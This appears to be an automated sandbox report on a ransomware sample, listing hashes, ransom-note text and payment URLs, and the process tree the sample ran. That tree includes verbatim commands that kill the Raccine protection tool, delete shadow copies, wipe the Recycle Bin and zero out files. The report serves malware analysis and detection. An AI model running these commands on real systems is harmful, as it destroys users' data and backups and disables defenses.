Analysis
-
max time kernel
145s -
max time network
57s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
17-05-2021 09:03
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
sample.exe
Resource
win10v20210408
General
-
Target
sample.exe
-
Size
142KB
-
MD5
e1f063d63a75e0e0e864052b1a50ab06
-
SHA1
75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
-
SHA256
8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
-
SHA512
25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
sample.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk sample.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
sample.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2104 taskkill.exe 3688 taskkill.exe 2100 taskkill.exe 3632 taskkill.exe 2188 taskkill.exe 1508 taskkill.exe 3800 taskkill.exe 2888 taskkill.exe 2252 taskkill.exe 2260 taskkill.exe 980 taskkill.exe 1540 taskkill.exe 2664 taskkill.exe 564 taskkill.exe 748 taskkill.exe 3960 taskkill.exe 3796 taskkill.exe 3716 taskkill.exe 3884 taskkill.exe 2664 taskkill.exe 4088 taskkill.exe 2452 taskkill.exe 716 taskkill.exe 980 taskkill.exe 3620 taskkill.exe 404 taskkill.exe 2264 taskkill.exe 3068 taskkill.exe 1568 taskkill.exe 3796 taskkill.exe 3984 taskkill.exe 1144 taskkill.exe 3240 taskkill.exe 4064 taskkill.exe 1764 taskkill.exe 3068 taskkill.exe 3104 taskkill.exe 716 taskkill.exe 2832 taskkill.exe 3784 taskkill.exe 3424 taskkill.exe 740 taskkill.exe 3012 taskkill.exe 1824 taskkill.exe 2960 taskkill.exe 3452 taskkill.exe 2364 taskkill.exe 4056 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
OpenWith.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings OpenWith.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 3668 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
sample.exepid process 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe 620 sample.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
OpenWith.exeOpenWith.exepid process 1780 OpenWith.exe 1508 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 620 sample.exe Token: SeDebugPrivilege 3960 taskkill.exe Token: SeDebugPrivilege 740 taskkill.exe Token: SeDebugPrivilege 716 taskkill.exe Token: SeDebugPrivilege 980 taskkill.exe Token: SeDebugPrivilege 4064 taskkill.exe Token: SeDebugPrivilege 3716 taskkill.exe Token: SeDebugPrivilege 3796 taskkill.exe Token: SeDebugPrivilege 3884 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 3620 taskkill.exe Token: SeDebugPrivilege 564 taskkill.exe Token: SeDebugPrivilege 404 taskkill.exe Token: SeDebugPrivilege 2264 taskkill.exe Token: SeDebugPrivilege 2252 taskkill.exe Token: SeDebugPrivilege 2100 taskkill.exe Token: SeDebugPrivilege 2260 taskkill.exe Token: SeDebugPrivilege 3012 taskkill.exe Token: SeDebugPrivilege 3632 taskkill.exe Token: SeDebugPrivilege 2188 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 980 taskkill.exe Token: SeDebugPrivilege 1824 taskkill.exe Token: SeDebugPrivilege 4088 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 2364 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 3796 taskkill.exe Token: SeDebugPrivilege 2452 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 748 taskkill.exe Token: SeDebugPrivilege 3452 taskkill.exe Token: SeDebugPrivilege 3800 taskkill.exe Token: SeDebugPrivilege 4056 taskkill.exe Token: SeDebugPrivilege 2832 taskkill.exe Token: SeDebugPrivilege 3104 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 3784 taskkill.exe Token: SeDebugPrivilege 3424 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 2888 taskkill.exe Token: SeDebugPrivilege 716 taskkill.exe Token: SeDebugPrivilege 3240 taskkill.exe Token: SeDebugPrivilege 3688 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 2060 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
sample.exepid process 620 sample.exe 620 sample.exe 620 sample.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
sample.exepid process 620 sample.exe 620 sample.exe 620 sample.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
Processes:
mshta.exeOpenWith.exeOpenWith.exepid process 188 mshta.exe 1780 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe 1508 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
sample.exedescription pid process target process PID 620 wrote to memory of 3960 620 sample.exe taskkill.exe PID 620 wrote to memory of 3960 620 sample.exe taskkill.exe PID 620 wrote to memory of 3984 620 sample.exe reg.exe PID 620 wrote to memory of 3984 620 sample.exe reg.exe PID 620 wrote to memory of 1288 620 sample.exe reg.exe PID 620 wrote to memory of 1288 620 sample.exe reg.exe PID 620 wrote to memory of 1956 620 sample.exe schtasks.exe PID 620 wrote to memory of 1956 620 sample.exe schtasks.exe PID 620 wrote to memory of 1704 620 sample.exe sc.exe PID 620 wrote to memory of 1704 620 sample.exe sc.exe PID 620 wrote to memory of 1496 620 sample.exe sc.exe PID 620 wrote to memory of 1496 620 sample.exe sc.exe PID 620 wrote to memory of 4036 620 sample.exe sc.exe PID 620 wrote to memory of 4036 620 sample.exe sc.exe PID 620 wrote to memory of 2208 620 sample.exe sc.exe PID 620 wrote to memory of 2208 620 sample.exe sc.exe PID 620 wrote to memory of 2152 620 sample.exe sc.exe PID 620 wrote to memory of 2152 620 sample.exe sc.exe PID 620 wrote to memory of 3968 620 sample.exe sc.exe PID 620 wrote to memory of 3968 620 sample.exe sc.exe PID 620 wrote to memory of 4012 620 sample.exe sc.exe PID 620 wrote to memory of 4012 620 sample.exe sc.exe PID 620 wrote to memory of 1764 620 sample.exe sc.exe PID 620 wrote to memory of 1764 620 sample.exe sc.exe PID 620 wrote to memory of 740 620 sample.exe taskkill.exe PID 620 wrote to memory of 740 620 sample.exe taskkill.exe PID 620 wrote to memory of 716 620 sample.exe taskkill.exe PID 620 wrote to memory of 716 620 sample.exe taskkill.exe PID 620 wrote to memory of 980 620 sample.exe taskkill.exe PID 620 wrote to memory of 980 620 sample.exe taskkill.exe PID 620 wrote to memory of 3976 620 sample.exe netsh.exe PID 620 wrote to memory of 3976 620 sample.exe netsh.exe PID 620 wrote to memory of 3716 620 sample.exe taskkill.exe PID 620 wrote to memory of 3716 620 sample.exe taskkill.exe PID 620 wrote to memory of 4064 620 sample.exe taskkill.exe PID 620 wrote to memory of 4064 620 sample.exe taskkill.exe PID 620 wrote to memory of 3796 620 sample.exe taskkill.exe PID 620 wrote to memory of 3796 620 sample.exe taskkill.exe PID 620 wrote to memory of 3884 620 sample.exe taskkill.exe PID 620 wrote to memory of 3884 620 sample.exe taskkill.exe PID 620 wrote to memory of 2664 620 sample.exe taskkill.exe PID 620 wrote to memory of 2664 620 sample.exe taskkill.exe PID 620 wrote to memory of 3620 620 sample.exe taskkill.exe PID 620 wrote to memory of 3620 620 sample.exe taskkill.exe PID 620 wrote to memory of 564 620 sample.exe taskkill.exe PID 620 wrote to memory of 564 620 sample.exe taskkill.exe PID 620 wrote to memory of 404 620 sample.exe taskkill.exe PID 620 wrote to memory of 404 620 sample.exe taskkill.exe PID 620 wrote to memory of 2264 620 sample.exe taskkill.exe PID 620 wrote to memory of 2264 620 sample.exe taskkill.exe PID 620 wrote to memory of 2252 620 sample.exe taskkill.exe PID 620 wrote to memory of 2252 620 sample.exe taskkill.exe PID 620 wrote to memory of 2100 620 sample.exe taskkill.exe PID 620 wrote to memory of 2100 620 sample.exe taskkill.exe PID 620 wrote to memory of 2260 620 sample.exe taskkill.exe PID 620 wrote to memory of 2260 620 sample.exe taskkill.exe PID 620 wrote to memory of 3632 620 sample.exe taskkill.exe PID 620 wrote to memory of 3632 620 sample.exe taskkill.exe PID 620 wrote to memory of 3012 620 sample.exe taskkill.exe PID 620 wrote to memory of 3012 620 sample.exe taskkill.exe PID 620 wrote to memory of 2188 620 sample.exe taskkill.exe PID 620 wrote to memory of 2188 620 sample.exe taskkill.exe PID 620 wrote to memory of 980 620 sample.exe taskkill.exe PID 620 wrote to memory of 980 620 sample.exe taskkill.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
sample.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" sample.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" sample.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnlockNew.shtml.[141-5D9-Y454]2⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.htaMD5
4327eade29c8136a9a681c47b567b97d
SHA160d8cb724de3c4974ea604de9406c950872cf8ae
SHA25662f1117aac61afa132c1555964adecccbd66c4b71fdda3b0a68babffcee898bb
SHA512ad66d8d83aeb26da99bbb58e22af241a0c15a5904250b6a61f5a1a5e6a8d56a291f75bcc42721dc649df0680bdc6250f809c1862dc454f748772784fe7a0a913
-
C:\Users\Admin\Desktop\UnlockNew.shtml.[141-5D9-Y454]MD5
18a4f65d78ecf967a2c8ac5430c61ab9
SHA1cdd8a116a71bd52269ef91960ddde56efd5d6c45
SHA2567dbc9b7f37a5757a19b695b4ad30d154d8c7b3c98685b12891762387329daa93
SHA5127d1aa0c312800864b49a4d93141188c89de6736be7d17b3854a012df67be5c420962a93ad00cf3e6de35707c6a023212aeecc18e911964269035fa360565c728
-
memory/404-140-0x0000000000000000-mapping.dmp
-
memory/564-139-0x0000000000000000-mapping.dmp
-
memory/620-116-0x000000001AD10000-0x000000001AD12000-memory.dmpFilesize
8KB
-
memory/620-114-0x0000000000100000-0x0000000000101000-memory.dmpFilesize
4KB
-
memory/716-173-0x0000000000000000-mapping.dmp
-
memory/716-130-0x0000000000000000-mapping.dmp
-
memory/740-129-0x0000000000000000-mapping.dmp
-
memory/748-161-0x0000000000000000-mapping.dmp
-
memory/980-148-0x0000000000000000-mapping.dmp
-
memory/980-131-0x0000000000000000-mapping.dmp
-
memory/1144-168-0x0000000000000000-mapping.dmp
-
memory/1288-119-0x0000000000000000-mapping.dmp
-
memory/1496-122-0x0000000000000000-mapping.dmp
-
memory/1508-154-0x0000000000000000-mapping.dmp
-
memory/1540-151-0x0000000000000000-mapping.dmp
-
memory/1568-157-0x0000000000000000-mapping.dmp
-
memory/1616-174-0x0000000000000000-mapping.dmp
-
memory/1704-121-0x0000000000000000-mapping.dmp
-
memory/1764-149-0x0000000000000000-mapping.dmp
-
memory/1764-128-0x0000000000000000-mapping.dmp
-
memory/1824-203-0x0000000000000000-mapping.dmp
-
memory/1824-150-0x0000000000000000-mapping.dmp
-
memory/1956-120-0x0000000000000000-mapping.dmp
-
memory/2060-201-0x000001EBC2456000-0x000001EBC2458000-memory.dmpFilesize
8KB
-
memory/2060-189-0x000001EBC2F70000-0x000001EBC2F71000-memory.dmpFilesize
4KB
-
memory/2060-178-0x0000000000000000-mapping.dmp
-
memory/2060-186-0x000001EBC2453000-0x000001EBC2455000-memory.dmpFilesize
8KB
-
memory/2060-184-0x000001EBC23E0000-0x000001EBC23E1000-memory.dmpFilesize
4KB
-
memory/2060-185-0x000001EBC2450000-0x000001EBC2452000-memory.dmpFilesize
8KB
-
memory/2100-143-0x0000000000000000-mapping.dmp
-
memory/2104-171-0x0000000000000000-mapping.dmp
-
memory/2152-125-0x0000000000000000-mapping.dmp
-
memory/2188-147-0x0000000000000000-mapping.dmp
-
memory/2208-124-0x0000000000000000-mapping.dmp
-
memory/2252-142-0x0000000000000000-mapping.dmp
-
memory/2260-144-0x0000000000000000-mapping.dmp
-
memory/2264-141-0x0000000000000000-mapping.dmp
-
memory/2364-156-0x0000000000000000-mapping.dmp
-
memory/2452-159-0x0000000000000000-mapping.dmp
-
